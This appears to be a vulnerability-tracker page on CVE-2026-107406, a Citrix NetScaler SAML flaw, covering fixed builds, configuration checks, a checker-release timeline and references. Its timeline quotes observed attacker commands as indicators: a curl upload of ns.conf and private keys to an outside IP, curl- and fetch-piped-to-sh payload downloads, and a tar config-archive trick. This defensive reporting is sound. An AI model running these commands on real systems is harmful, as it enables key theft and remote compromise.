CVE-2026-107406: Citrix NetScaler SAML memory overflow leading to RCE or DoS

CVE-2026-107406 is a Citrix NetScaler ADC and Gateway vulnerability: SAML memory overflow leading to RCE or DoS, rated CVSS 4.0 9.5 Critical. Citrix disclosed it on 8 October 2026 in bulletin CTX697191: a SAML memory overflow leading to remote code execution or denial of service. On the builds fixed for the earlier bulletins (14.1-73.37 to 73.41, 13.1-64.23 to 64.28) only a SAML IdP is affected; on older builds a SAML SP or IdP. The bulletin lists no workaround, and Citrix says - per secondary coverage of its customer guidance - that it is not aware of any unmitigated exploits. [4][96]

CVE
CVE-2026-107406
Product
Citrix NetScaler ADC and NetScaler Gateway
Bulletin
CTX697191 [4]
Severity
CVSS 4.0: 9.5 Critical
Exploitation
No exploitation reported
CISA KEV
No
Disclosed
Fixed builds
14.1-73.46, 13.1-64.29 and FIPS/NDcPP builds

CVE-2026-107406

No exploitation reported CVSS 4.0: 9.5 Critical
Type
Memory overflow vulnerability leading to Remote Code Execution or Denial of Service (CWE-119). [4]
Exposure (IdP)
On the builds already fixed for CTX697096 and CVE-2026-88779 - 14.1-73.37 to 73.41 inclusive, 14.1-FIPS 73.37 FIPS to 73.41 FIPS, 13.1-64.23 to 64.28 and 13.1-FIPS/NDcPP 37.279 to 37.282 - the appliance is affected only when configured as a SAML identity provider (IdP). [4]
Exposure (SP or IdP)
On older builds - before 14.1-73.37, before 14.1-73.37 FIPS, before 13.1-64.23 and before 13.1-37.279 - the appliance is affected when configured as a SAML service provider (SP) or SAML IdP. [4]
Config check
Same applicability check as CVE-2026-88779: the configuration contains add authentication samlAction (SP) or add authentication samlIdPProfile (IdP). [4][2]
Fix
14.1-73.46 and later; 13.1-64.29 and later; 14.1-FIPS 14.1-73.46 FIPS and later; 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later. These builds also contain the CTX697096 and CVE-2026-88779 fixes, so one upgrade covers all three bulletins. Builds the bulletin does not list (14.1-73.42 to 73.45) with SAML configured: verify with Citrix, per the Poppelgaard checker. [4][49]
Workaround
The bulletin lists no workaround. [4][49]
Also affected
Secure Private Access Hybrid deployments using NetScaler instances must upgrade these instances to the recommended versions. Citrix-managed cloud services and Citrix-managed Adaptive Authentication are upgraded by Cloud Software Group itself. [4]
Status
Bulletin published 8 Oct 2026. NVD received the record at 22:17 UTC the same day (status Received; the CNA CVSS v4.0 9.5 Critical is carried as Secondary). Not in the CISA KEV catalog as of catalog 2026.10.08. Per Citrix customer guidance as quoted by secondary coverage, Citrix is not aware of any unmitigated exploits of this vulnerability; no exploitation is independently confirmed. [6][24][96]
Acknowledgement
Michael Tucker, Chew Keong Tan and Alex Bernier of the JPMorgan Chase XOR Team, and Maxim Suhanov - the same researchers credited in CTX697096. [4]

CVE-2026-107406 vulnerability records

Official records for CVE-2026-107406, checked on 9 October 2026. The CVE record was published by the CNA (NetScaler) at 2026-10-08 22:17 UTCNVD received the record on 8 October 2026 at 2026-10-08 22:17 UTC with the CNA description and CVSS v4.0 9.5 Critical carried as Secondary; NVD analysis has not started, and the CVE is not in the CISA KEV catalog..

CVSS 4.0 vectorCVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:L
Weakness (NVD)CWE-119
NVD statusReceived (published 8 Oct 22:17 UTC; CNA CVSS v4.0 9.5 Critical carried as Secondary; analysis not started)

CVE-2026-107406 timeline

  1. Research

    Poppelgaard checker v1.9 adds public indicators

    Release 1.9 of the free, read-only CTX697096 checker script adds, among others, Arctic Wolf's nsmon.pl implant, the Unit 42 .deb webshell and more attacker IPs, and tags each attack line as before or after the fix. Its author says a clean result is not proof of a clean appliance.

    Sources: [49]

  2. Official advisory

    Citrix releases a new responder policy via Support (3 October); not yet in Citrix's public post

    Citrix has released a new responder policy as a mitigation for the SAML issue, distributed through Citrix Support on 3 October. The Poppelgaard checker README describes it and recognises it by behaviour on the appliance: any responder policy whose rule mentions samlauth or doAuthentication, bound to a Gateway/AAA vserver or globally, alongside Citrix's earlier RSP_POL_DROP and community Gotham policies. Citrix's public SAML post does not mention the policy yet and its text has not been published; distribution is through Support (under NDA), which matches Beaumont's reports of a responder policy shared through Support ("the policy citrix gave out doesn't work for me" on Oct 2, "the Citrix support mitigations don't appear to work" on Oct 3). The checker reminds admins to ask Citrix Support for the new policy and verifies whether it is bound - and flags a [CHECK] state where a policy is bound but the Responder feature is disabled, which silently ignores it.

    Sources: [49][2][94][95]

  3. Research

    Checker v1.13 + Gotham 5 Oct update: 88779 attacker IP, Huntback.io decoys, pre-disclosure /saml/login sources, SAML probe hunting, "did it run?" shell-log check

    Poppelgaard's checker reaches v1.13 (105 attacker IPs, 15 domains, 34 hashes) in two steps, with third-party indicators carried from their public sources. Gotham Technology Group's 5 October update (shared with permission) adds 138.199.60.5 as an attacker IP - it sent CVE-2026-88779 crash payloads to /saml/login and /cgi/samlauth on 5 October - plus a yellow hunting lead for the 138.199.60.0/24 hosting/VPN range used throughout the SAML attack, and four sources that sent GET /saml/login before disclosure (38.60.206.53, 38.60.212.144, 149.102.254.17, 130.94.19.84). Checker v1.13 (b159493, later refined in 81c7834) adds five Huntback.io decoy IPs that sent the CVE-2026-88771 nx_verify.html injection check (138.199.60.22, 138.199.60.36, 146.70.199.170, 146.70.211.157, 23.162.8.173), randomly named *.receiver webshells in the web folders as a compromise signal (Huntback.io), a Lupovis hunting lead - User-Agent probe/1 with a ~2.8 KB SAMLRequest inflating to 62 KiB, seen on 17 September, before CVE-2026-88779 was public - and Sliver implant file checks: citrix3.bad is reported as compromise, an executable /var/tmp/.host as compromise, any other /var/tmp/.host only as a [CHECK] so a harmless file never turns red on its own. New "did it run?" check (idea from Patrick Wagner's gerGEIGER log analysis in Manuel Winkel's (Deyda) triage script; own implementation): for each login-injection attempt it shows the download hosts named in the payloads (defanged, for firewall/DNS/proxy-log searches), the likely source IP (a Client_ip field in the line, or logon requests in the HTTP access logs within 5 seconds of the attempt, with ns.log timezone differences detected automatically), and whether the payload shows up in a shell command in sh.log, bash.log or CLI shell_command lines - reported as compromise; an admin's grep or cat does not count, and the checker says when the shell logs do not reach back to the first attempt. Fewer false alarms: configuration commands such as add ns acl and bind policy patset lines after applying a mitigation batch are no longer attack lines (failed NITRO/API logins still count, because the injection can sit in the user name), and links alone in a custom theme's resources/*.xml and plugins.xml are no longer red because both hold links by design - script tags, eval and fetch are still reported. A webshell hit now also says that upgrading does not remove a webshell dropped before the upgrade. All new indicators are on this page's IoC list with per-indicator caveats.

    Sources: [49]

  4. Research

    Checker v1.14: config/SSL-key theft payload - ns.conf + all private keys dumped to a random .css, exfil to 81.94.239.8:8877; verdict line for compromised boxes

    Poppelgaard's checker reaches v1.14 (106 attacker IPs, 15 domains, 34 hashes) with a config-and-key-theft payload seen in the field: it writes ns.conf and every /nsconfig/ssl/*.key into a random 6-character .css file in /var/netscaler/logon/LogonPoint (example 74tns8.css), sends that file with curl --data-binary to 81.94.239.8:8877, and the attacker then downloads the .css from the Gateway - if it worked, the attacker has the configuration and every private key. New checks: any file under the web folders (any extension) holding ===CONF: / ===KEY: markers, a private key or ns.conf lines is reported as compromise with advice to rotate all keys, certificates and passwords; GET requests for a random 6-character .css directly in LogonPoint are listed with source IP, where HTTP 404 means the dump never landed and HTTP 200 means the file existed and was downloaded (compromise); curl --data-binary @<file> and :8877/ are new exploit strings; 81.94.239.8 added as an attacker IP (single third-party field report, unverified - DEAC Hosting, Latvia; VirusTotal 1 of 92). A new final verdict line reports "VERDICT: COMPROMISED - follow CTX694799" (fixed build) or "COMPROMISED and VULNERABLE - follow CTX694799 first" with exit code 2, replacing the old "follow-up items"/"upgrade now" wording that risked wiping evidence. Community pull requests #4/#5 (feiglein74) add: any .php/.phtml under /var/netscaler/logon and /var/vpn, one-line webshells calling a request parameter as a function, PHP files the Apache error log shows running or that still exist (with first and last dates), setuid/setgid programs under /var, /tmp, /nsconfig, /flash, /home and /root, files dropped in the web folders that were downloaded with HTTP 200, and two field finds from Citrix's own IoC scan - a 2023 CVE-2023-3519-wave webshell at LogonPoint/uiareas/linux/gnuplot.php and a setuid backdoor at /var/rgroupadd (possibly 2023 leftovers; check file dates). A payload writing to a file every appliance has (e.g. /etc/httpd.conf) no longer counts as "the command ran". The release repeats the standing advice: block outbound NetScaler (NSIP/SNIP) traffic to the internet except what it needs - this payload, like the f.pylrk.cc downloads, only works if the appliance can reach the attacker's server.

    Sources: [49]

  5. Research

    Rapid7 MDR: earliest exploitation 20 Sep by 149.104.78.208 - config/keys archived to the web-served /vpn/c; two organisations compromised

    Rapid7's ETR blog (updated 6 Oct) details what its MDR observed: the earliest CVE-2026-88771 exploitation attempt in its telemetry was 20 September 2026 14:28:43 UTC from 149.104.78.208 - only two attempts that day, not yet widespread. The injected username (a fake pitboss "missed too many heartbeats" line) ran tar czf /var/netscaler/gui/vpn/c -C /flash nsconfig, which archives /flash/nsconfig into the publicly served /var/netscaler/gui/vpn/ folder: ns.conf (encrypted nsroot and admin passwords, LDAP/RADIUS/TACACS bind passwords), the ssl/ directory (certificates and private keys), SSH host keys and license files. Once the command runs, any unauthenticated GET https://<gateway>/vpn/c returns the archive with no login. Rapid7 identifies two organisations compromised through CVE-2026-88771: this command injection, and a .ctxs.receiver webshell at /var/netscaler/logon/LogonPoint/custom/.ctxs.receiver (SHA-256 ed082f74..., observed 24 September - the same sample IFIN relayed from Reddit, now vendor-confirmed). The checker v1.11 carried 149.104.78.208 with a Rapid7 attribution and the /vpn/c tar detail; the tar archive /vpn/c is already a compromise check in the checker (HTTP 200 on /vpn/c = the config archive was likely downloaded). Also in this update: the 6-crash-then-reboot behaviour of CVE-2026-88779 and the October content-release checks. All indicators are on this page's IoC list.

    Sources: [42][49]

  6. Official advisory

    NVD publishes CVE-2026-107406 (status Received); not in CISA KEV

    NVD received the CVE-2026-107406 record at 22:17 UTC with the CNA (NetScaler) description and the CVSS v4.0 9.5 Critical score carried as Secondary; NVD analysis has not started. The CISA KEV catalog (version 2026.10.08, released 20:09 UTC the same day) does not contain CVE-2026-107406, and no exploitation has been publicly confirmed. Per secondary coverage of Citrix's customer guidance, Citrix says it is not aware of any unmitigated exploits of this vulnerability.

    Sources: [6][24][96]

  7. Research

    Poppelgaard checker v1.15 and v1.16: WHIPSHOT/SLAPSHOT scan detection, log-reflection technique, SOCRadar "NetScaler C2" agent, CVE-2026-107406 IdP/SP check

    v1.15 (8 Oct): Lupovis shows scanning for the WHIPSHOT/SLAPSHOT webshells started before Mandiant published them, with a 10-step scan since 4 Oct; the checker adds receiver.deb / random 12-character .deb theme-folder probes, the g-suffix .css cache-bypass requests, and detects the log-reflection technique - an actor parks a whole shell script in a tagged User-Agent so it lands in the HTTP access log, then the CVE-2026-88771 injection carries only grep <tag>: /var/log/htt* | sed ... | sh, so filters watching the login field never see the payload. SOCRadar's automated "NetScaler C2" framework injects curl${IFS}-sk${IFS}45.143.130.195:8899/s/<id>|sh and installs a polling agent at /tmp/.nsagent, reported by the checker as compromise. v1.16 (8 Oct): adds the CVE-2026-107406 build and SAML IdP/SP check (verdict VULNERABLE_CVE-2026-107406, exit code 2, also on builds already fixed for CTX697096 and CVE-2026-88779), and - from a community report the same day - an overnight wave of the same login injection fetching https://v5v.in/r.sh?k=<key>|sh; payload host v5v.in and IP 72.5.65.111 added (totals 132 attacker IPs, 18 domains, 38 hashes). Since v1.15 the compromise sweep runs by default on the appliance.

    Sources: [49]

  8. Official advisory

    Citrix publishes CTX697191: CVE-2026-107406, SAML memory overflow leading to RCE or DoS, CVSS 9.5 - SAML deployments must upgrade again

    Third NetScaler bulletin of the campaign, separate from CTX697096 and CTX697174. Preconditions are SAML SP or IdP with version-dependent scope: on the builds already fixed for the earlier bulletins (14.1-73.37 to 73.41 inclusive, 14.1-FIPS 73.37 to 73.41 FIPS, 13.1-64.23 to 64.28, 13.1-FIPS/NDcPP 37.279 to 37.282) only a SAML IdP (add authentication samlIdPProfile) is affected; on older builds both SP (samlAction) and IdP. Fixed in 14.1-73.46, 13.1-64.29, 14.1-73.46 FIPS and 13.1-37.283 FIPS/NDcPP - builds that also carry the CTX697096 and CVE-2026-88779 fixes, so one upgrade covers everything. The bulletin lists no workaround and adds that Secure Private Access Hybrid deployments using NetScaler instances are also affected. This is the third required upgrade in under two weeks for SAML appliances that kept up with the previous bulletins.

    Sources: [4]

Questions about CVE-2026-107406

Is there a new NetScaler issue involving SAML?

Yes - two, both needing SAML SP or IdP configuration. CVE-2026-88779 (bulletin CTX697174, 3 Oct): memory overflow leading to denial of service, CVSS 4.0 8.7, exploited in targeted attacks, in CISA KEV since 4 Oct; fixed in 14.1-73.41, 13.1-64.28 and the matching FIPS/NDcPP builds. CVE-2026-107406 (bulletin CTX697191, 8 Oct): memory overflow leading to remote code execution or denial of service, CVSS 4.0 9.5; on the builds fixed for the earlier bulletins (14.1-73.37 to 73.41, 13.1-64.23 to 64.28) it affects only appliances configured as a SAML IdP, and on older builds also SAML SPs; fixed in 14.1-73.46, 13.1-64.29 and the matching FIPS/NDcPP builds, which cover all three bulletins in one upgrade. Citrix lists no workaround for either. Per secondary coverage of its customer guidance Citrix is not aware of any unmitigated exploits of CVE-2026-107406, and no exploitation is independently confirmed. Beaumont reports his patched honeypots crashing, which is one researcher's observation. [2][3][4][31][90][91]

Which NetScaler vulnerabilities are exploited?

CVE-2026-88771 (unauthenticated remote command execution in the default configuration, CVSS 4.0 9.5), CVE-2026-88772 (DTLS memory overflow leading to RCE or DoS, CVSS 4.0 9.5) and, since 4 Oct 2026, CVE-2026-88779 (SAML memory overflow leading to DoS, CVSS 4.0 8.7). All three are in CISA's KEV catalog. CVE-2026-107406 (SAML, CVSS 4.0 9.5, 8 Oct) is not in KEV and Citrix says it is not aware of any unmitigated exploits of it. Kevin Beaumont reports CVE-2026-88773 was chained with the two, but no other source has independently confirmed that. No exploitation is reported for CVE-2026-88774 to CVE-2026-88778. [1][24][3][4][79]

Which NetScaler versions fix CVE-2026-88771 and CVE-2026-88772?

Per CTX697096: NetScaler ADC/Gateway 14.1-73.37 and later; 13.1-64.23 and later; ADC 14.1-FIPS 14.1-73.37 FIPS and later; ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.279 and later (the bulletin also writes this build as 13.1-37.279). A SAML appliance should not stop there: 14.1-73.46, 13.1-64.29 and the matching FIPS/NDcPP builds fix CVE-2026-88779 and CVE-2026-107406 as well. [1]

What fixes CVE-2026-107406, and why upgrade again if I already patched?

CVE-2026-107406 is fixed in 14.1-73.46, 13.1-64.29, 14.1-73.46 FIPS and 13.1-37.283 FIPS/NDcPP (bulletin CTX697191, 8 Oct 2026). The builds from 27 Sep and 3 Oct (14.1-73.37/73.41, 13.1-64.23/64.28 and the FIPS/NDcPP equivalents) do not fix it: on those, an appliance configured as a SAML IdP is affected, and on older builds a SAML SP or IdP. Those builds are also where CVE-2026-88779 stops, so the 73.46/64.29/37.283 generation is the first that covers all three bulletins - the third required upgrade in under two weeks for SAML deployments that kept up. Check the configuration for add authentication samlIdPProfile (IdP) or add authentication samlAction (SP); the bulletin lists no workaround. [4][3]

Which NetScaler versions fix CVE-2026-88779, and why does stat denylist global AAA_REQUEST fail?

CVE-2026-88779 needs newer builds than the September fixes: 14.1-73.41, 13.1-64.28, 14.1-73.41 FIPS or 13.1-37.282 FIPS/NDcPP (per bulletin CTX697174). CVE-2026-107406 then needs 14.1-73.46, 13.1-64.29, 14.1-73.46 FIPS or 13.1-37.283 FIPS/NDcPP (CTX697191) - install that generation and both SAML issues are covered. As an interim measure, Citrix has released Global Deny List signatures for standard (non-FIPS) 14.1 and 13.1 appliances on the September builds, managed through NetScaler Console. Beazley's IR (4 Oct) describes the mechanism: the crash hits nsaaad while processing signature canonicalization with an oversized InclusiveNamespaces PrefixList; attackers use the resulting reboots to re-trigger the CVE-2026-88771 log injection on already-infected appliances, but appliances patched on 27 Sep no longer execute the injected commands. A customer report in Citrix's forum (unconfirmed, no Citrix reply) says that after patching to 13.1-64.28, stat denylist global AAA_REQUEST returns "no such resource" or an empty result where it previously showed hits - the customer's own interpretation is that the Deny List signatures apply per firmware to the CVEs known for that build. Verify mitigation state through NetScaler Console rather than relying on that one command. [3][31][50]

Next steps

Related pages

References

#SourceTypeURL
1Citrix - CTX697096 security bulletin (Sep 27)Primary official advisorieshttps://support.citrix.com/external/article/CTX697096/citrix-netscaler-adc-and-citrix-netscale.html
2Citrix community blog - Security Update: Guidance for NetScaler SAML Authentication Deployments (Oct 2; new issue, independent of CTX697096)Primary official advisorieshttps://community.citrix.com/techzone-blogs/110_security-updates/security-update-guidance-for-netscaler-saml-authentication-deployments/
3Citrix - CTX697174 security bulletin for CVE-2026-88779 (Oct 3; fixed builds 14.1-73.41, 13.1-64.28, FIPS/NDcPP) and the accompanying Citrix blog on Global Deny List mitigationsPrimary official advisorieshttps://support.citrix.com/external/article/CTX697174/citrix-netscaler-adc-and-citrix-netscale.html
4Citrix - CTX697191 security bulletin for CVE-2026-107406 (Oct 8; SAML memory overflow leading to RCE or DoS, CVSS v4.0 9.5; fixed builds 14.1-73.46, 13.1-64.29 and the FIPS/NDcPP builds; no workaround listed)Primary official advisorieshttps://support.citrix.com/external/article/CTX697191/citrix-netscaler-adc-and-citrix-netscale.html
5Citrix community blog - Protecting customers: immediate guidance for CVE-2026-107406 in NetScaler ADC and NetScaler Gateway (Oct 8; per secondary coverage Citrix states it is not aware of any unmitigated exploits of this vulnerability) verification pendingPrimary official advisorieshttps://community.citrix.com/techzone-blogs/110_security-updates/protecting-customers-immediate-guidance-for-cve-2026-107406-in-netscaler-adc-and-netscaler-gateway-r1631/
6NIST NVD - CVE-2026-107406 record (published Oct 8 22:17 UTC, status Received; CNA CVSS v4.0 9.5 carried as Secondary; analysis not started)Primary official advisorieshttps://nvd.nist.gov/vuln/detail/CVE-2026-107406
7Citrix - CTX694799 Steps to Take if NetScaler ADC is Suspected to be CompromisedPrimary official advisorieshttps://support.citrix.com/external/article/CTX694799/steps-to-take-if-netscaler-adc-is-suspec.html
8Citrix community blog - Security Bulletin for CVE-2026-88771 through CVE-2026-88778 (incl. IoC section; last updated Sep 30) verification pendingPrimary official advisorieshttps://community.citrix.com/techzone-blogs/110_security-updates/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve-2026-88771-through-cve-2026-88778/
9Citrix (CTX-Michael) on r/Citrix, Sep 27 - CRITICAL UPDATE announcementPrimary official advisorieshttps://www.reddit.com/r/Citrix/comments/1wro1yf/critical_update_citrix_netscaler_adc_and_citrix/
10NetScaler Console documentation - Indicators of Compromise detection (incl. Citrix disclaimer on limits; page moved/withdrawn from docs.netscaler.com as of 6 Oct - URL now redirects to the docs home)Primary official advisorieshttps://docs.netscaler.com/en-us/netscaler-console-service/instance-advisory/ioc
11CISA alert - Critical zero-day vulnerabilities exploited in Citrix NetScaler ADC/Gateway (Sep 27; updated Oct 2 with a SIGMA detection rule)Primary official advisorieshttps://www.cisa.gov/news-events/alerts/2026/09/27/critical-zero-day-vulnerabilities-exploited-citrix-netscaler-adc-gateway
12CISA Code & Media Analysis SIGMA rule - Citrix NetScaler CVE-2026-88771 and CVE-2026-88772 (TLP:CLEAR, test status; repo may be updated)Primary official advisorieshttps://github.com/cisagov/SIGMA_Rules/blob/develop/CMA_SIGMA_Citrix_CVE_2026_8871.yaml
13NCSC-NL advisory NCSC-2026-0394, version 1.0.1 (Sep 30; probability high, damage high; per-CVE scores and preconditions)Primary official advisorieshttps://advisories.ncsc.nl/2026/ncsc-2026-0394.html
14NCSC-UK - Exploitation of vulnerabilities affecting Citrix NetScaler ADC and GatewayPrimary official advisorieshttps://www.ncsc.gov.uk/news/exploitation-of-vulnerabilities-affecting-citrix-netscaler-adc-and-citrix-netscaler-gateway
15CSA Singapore - AL-2026-129Primary official advisorieshttps://www.csa.gov.sg/alerts-and-advisories/alerts/al-2026-129/
16Canadian Centre for Cyber Security - AL26-024Primary official advisorieshttps://www.cyber.gc.ca/en/alerts-advisories/al26-024-critical-vulnerabilities-affecting-citrix-netscaler-adc-netscaler-gateway-cve-2026-88771-cve-2026-88772
17CERT-FR alert CERTFR-2026-ALE-011 (Sep 28, updated Sep 30)Primary official advisorieshttps://cert.ssi.gouv.fr/alerte/CERTFR-2026-ALE-011/
18CSSF (Luxembourg) communique - Multiple Critical Vulnerabilities in Citrix NetScaler ADC and NetScaler Gateway (Sep 28)Primary official advisorieshttps://www.cssf.lu/en/2026/09/multiple-critical-vulnerabilities-in-citrix-netscaler-adc-and-netscaler-gateway/
19CERT Quebec CERTQC-AVIS-2026-364 (Sep 28, TLP:CLEAR)Primary official advisorieshttps://www.cyber.gouv.qc.ca/avis/certqc-avis-2026-364
20HKCERT - Citrix Products Multiple Vulnerabilities (Sep 28)Primary official advisorieshttps://www.hkcert.org/security-bulletin/citrix-products-multiple-vulnerabilities_20260928
21ACSC (Australia) - Critical vulnerabilities in Citrix NetScaler ADC and NetScaler Gateway (28 Sep; updated 3 Oct with the new SAML issue and confirmed Australian impacts)Primary official advisorieshttps://www.cyber.gov.au/about-us/view-all-content/alerts-and-advisories/critical-vulnerabilities-in-citrix-netscaler-adc-and-citrix-netscaler-gateway-products
22BSI (Germany) - Citrix NetScaler: Systeme werden ueber ZeroDay-Schwachstellen angegriffen, BITS-H 2026-289305-1132, version 1.1 (Oct 1, TLP:CLEAR)Primary official advisorieshttps://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2026/2026-289305-1032.pdf?__blob=publicationFile&v=4
23NCSC-FI / Traficom (Finland) - Citrix NetScaler vulnerabilities exploited in Finland (1 Oct; intrusions in Finland before the patches)Primary official advisorieshttps://kyberturvallisuuskeskus.fi/en/news/citrix-netscaler-vulnerabilities-exploited-finland
24CISA Known Exploited Vulnerabilities catalog (CVE-2026-88771 and -88772 added Sep 27, due Sep 30; CVE-2026-88779 added Oct 4, due Oct 7)Primary official advisorieshttps://www.cisa.gov/known-exploited-vulnerabilities-catalog
25CERT-EU Security Advisory 2026-014 - Critical Vulnerabilities in Citrix NetScaler ADC and Gateway (Sep 27)Primary official advisorieshttps://cert.europa.eu/publications/security-advisories/2026-014/
26DKCERT (CERT for Danish universities and research) - To kritiske NetScaler 0-dage udnyttes aktivt før patch (Sep 29)Primary official advisorieshttps://cert.dk/node/639
27NHS England Digital cyber alert CC-4858 (Sep 28) - Exploitation of zero-day vulnerabilities affecting Citrix NetScalerPrimary official advisorieshttps://digital.nhs.uk/cyber-alerts/2026/cc-4858
28CIRCL TR-100 - per-CVE configuration-check CLI commandsPrimary official advisorieshttps://www.circl.lu/pub/tr-100/
29Dutch government letter to parliament - Kwetsbaarheden Citrix Netscaler (2026D47262, Sep 29)Primary official advisorieshttps://www.tweedekamer.nl/kamerstukken/brieven_regering/detail?id=2026D47262&did=2026D47262
30CVE.org - CVE-2026-88771 record (reserved Sep 10 07:14 UTC by NetScaler; published Sep 27 16:02 UTC)Primary official advisorieshttps://www.cve.org/CVERecord?id=CVE-2026-88771
31Tenable Research Special Operations - FAQ on the reported Citrix NetScaler zero-days (Sep 27, last updated Oct 4 with CVE-2026-88779, KEV addition and GDL mitigations; also first to report the leaked NCSC-NL pre-notification TLP marking)Technical researchhttps://www.tenable.com/blog/frequently-asked-questions-about-reported-citrix-netscaler-zero-day-vulnerabilities
32CERT-EU - Taking "execute logging" a bit too literally - CVE-2026-88771 (Sep 28)Technical researchhttps://www.cert.europa.eu/blog/taking-execute-logging-a-bit-too-literally-cve-2026-88771
33watchTowr Labs part 1 - Oh Look, the Foot Gun Went Off Again (CVE-2026-88771) (Sep 28)Technical researchhttps://labs.watchtowr.com/oh-look-the-foot-gun-went-off-again-citrix-netscaler-preauth-command-injection-cve-2026-88771/
34watchTowr Detection Artefact Generator - CVE-2026-88771 (GitHub)Technical researchhttps://github.com/watchtowrlabs/watchTowr-vs-Citrix-Netscaler-CVE-2026-88771
35watchTowr Labs part 2 - Here We Go Again (CVE-2026-88772), Sina Kheirkhah (Sep 29)Technical researchhttps://labs.watchtowr.com/here-we-go-again-citrix-netscaler-dtls-preauth-memory-overflow-cve-2026-88772/
36watchTowr Detection Artefact Generator - CVE-2026-88772 (GitHub)Technical researchhttps://github.com/watchtowrlabs/watchTowr-vs-Citrix-Netscaler-CVE-2026-88772
37watchTowr Intel - Post-Exploitation Analysis & Artifacts: Citrix NetScaler CVE-2026-88771 (Oct 7; honeypot sensor network: OOB probes, Sliver ns_helper implant, trojanized Dropbear SSH backdoor on tcp/37512, Perl stager with gw_health superuser and password-keyed PHP webshell, SSH-key spray, ns.conf theft; warm-reload claim for CVE-2026-88772/88779 crashes)Technical researchhttps://watchtowr.com/intelligence/post-exploitation-analysis-artifacts-citrix-netscaler-cve-2026-88771/
38Martin's Blog (mac.sploit.dk) - "NetScaler Needs More Than Another Patch" (Oct 2 08:00 CEST; opinion/analysis: platform posture, 15.1 Linux Tech Preview, what to demand at renewal)Technical researchhttps://mac.sploit.dk/blog/netscaler-needs-more-than-a-patch/
39Martin's Blog (mac.sploit.dk) - "CVE-2026-88771: From a Failed NetScaler Login to a Shell" (Sep 29; reverse engineering of ns_monuploadd_err.pl on 14.1-73.30/73.37: source-to-shell path, -WR trigger not reproduced, detection engineering with confidence levels)Technical researchhttps://mac.sploit.dk/blog/cve-2026-88771-netscaler-login-log-command-injection/
40Martin's Blog (mac.sploit.dk) - "CVE-2026-88772: Following a NetScaler DTLS Overflow Across Two Builds" (Sep 29; binary comparison of nsppe 73.30/73.37: missing cumulative bound, 0x8c00 capacity check added; static only, no exploit run; flags type-DTLS load-balancing vservers as easy-to-miss exposure)Technical researchhttps://mac.sploit.dk/blog/cve-2026-88772-netscaler-dtls-memory-overflow/
41Martin's Blog (mac.sploit.dk) - "Finding the NetScaler SAML Crash in nsaaad" (Oct 3, updated Oct 4; reverse engineering + controlled lab: canonicalize_data 16-entry unterminated stack array, canary read as string pointer, SIGBUS in strlen; internal-message path only, no AAA licence for external test; fixed-build comparison not done)Technical researchhttps://mac.sploit.dk/blog/netscaler-saml-prefixlist-nsaaad-crash/
42Rapid7 ETR - Zero-Day Exploitation of Citrix NetScaler ADC and Gateway (Sep 28; last updated Oct 6: MDR observed exploitation from 20 Sep 14:28 UTC by 149.104.78.208 - tar of /flash/nsconfig to /vpn/c - two organisations compromised; .ctxs.receiver webshell sample hash ed082f74... observed 24 Sep)Technical researchhttps://www.rapid7.com/blog/post/etr-zero-day-exploitation-of-citrix-netscaler-adc-and-gateway-cve-2026-88771-and-cve-2026-88772/
43Truesec - Multiple Critical Vulnerabilities in Citrix NetScaler ADC and NetScaler Gateway (Sep 28)Technical researchhttps://www.truesec.com/hub/blog/multiple-critical-vulnerabilities-in-citrix-netscaler-adc-and-netscaler-gateway
44Google GTIG / Mandiant - Defending Against Active Exploitation of Citrix NetScaler ADC and Gateway Appliances (Sep 29)Technical researchhttps://cloud.google.com/blog/topics/threat-intelligence/defending-against-active-exploitation-of-citrix-netscaler-adc-and-gateway-appliances
45Nextron Systems (Florian Roth) - New THOR Detection Coverage for CVE-2026-88771 and CVE-2026-88772 (Sep 29)Technical researchhttps://www.nextron-systems.com/2026/09/29/new-thor-detection-coverage-for-citrix-netscaler-cve-2026-88771-and-cve-2026-88772/
46Arctic Wolf - Citrix NetScaler Active Exploitation via CVE-2026-88771 (IoC pack, Sep 30)Technical researchhttps://github.com/rtkwlf/wolf-tools/tree/main/pack_alerts/202609-citrix-netscaler-active-exploitation-cve-2026-88771
47Sygnia - Actively Exploited NetScaler Vulnerabilities (IR-based advisory, Sep 30)Technical researchhttps://www.sygnia.co/threat-reports-and-advisories/actively-exploited-netscaler-vulnerabilities/
48TENEX - What TENEX Observed Inside Active Exploitation of CVE-2026-88771 (Sep 30)Technical researchhttps://tenex.ai/blog/what-tenex-observed-inside-active-exploitation-of-netscaler-zero-day/
49Poppelgaard - NetScaler CTX697096/CTX697174/CTX697191 checker (free read-only script; v1.16 released Oct 8: CVE-2026-107406 build and SAML IdP/SP check on every run - verdict VULNERABLE_CVE-2026-107406 and exit code 2 also on builds already fixed for CTX697096 and CVE-2026-88779 - plus a community-reported overnight wave of the same login injection fetching https://v5v.in/r.sh?k=<key>|sh, payload host v5v.in and IP 72.5.65.111 added, totals 132 IPs / 18 domains / 38 hashes; v1.15 Oct 8: WHIPSHOT/SLAPSHOT scanning detection per Lupovis (scan started before Mandiant published the webshells, 10-step scan since Oct 4), log-reflection technique - a whole shell script parked in a tagged User-Agent landing in the HTTP access log, then the CVE-2026-88771 injection runs only grep <tag>: /var/log/htt* | sed ... | sh - the SOCRadar "NetScaler C2" automated injection tool with polling agent /tmp/.nsagent (compromise) and 45.143.130.195, and 16 Huntback.io attacker IPs (ns.conf theft, tunnel droppers via pinggy/serveo, several Tor exits), compromise check now runs by default on the appliance, receiver.deb / random 12-char .deb theme-folder probes, g-suffix .css cache-bypass requests; v1.14: config/SSL-key theft payload - ns.conf + /nsconfig/ssl/*.key dumped to a random 6-char .css in LogonPoint, exfil to 81.94.239.8:8877 via curl --data-binary; pick-up 200 = compromise, 404 = failed; VERDICT: COMPROMISED exit code; PR #4/#5: .php/.phtml under /var/netscaler/logon and /var/vpn, setuid/setgid under /var, /tmp, /nsconfig, /flash, /home, /root, CVE-2023-3519 gnuplot.php and /var/rgroupadd; v1.12 removed pyrlnk.cc per issue #3)Technical researchhttps://github.com/ThomasPoppelgaard/netscaler-ctx697096-checker
50Beazley Security second-wave indicators (BSL-A1216, updated Oct 4 with Update 6; carried in the Poppelgaard checker v1.12 via Gotham Technology Group, shared with permission)Technical researchhttps://labs.beazley.security/advisories/BSL-A1216
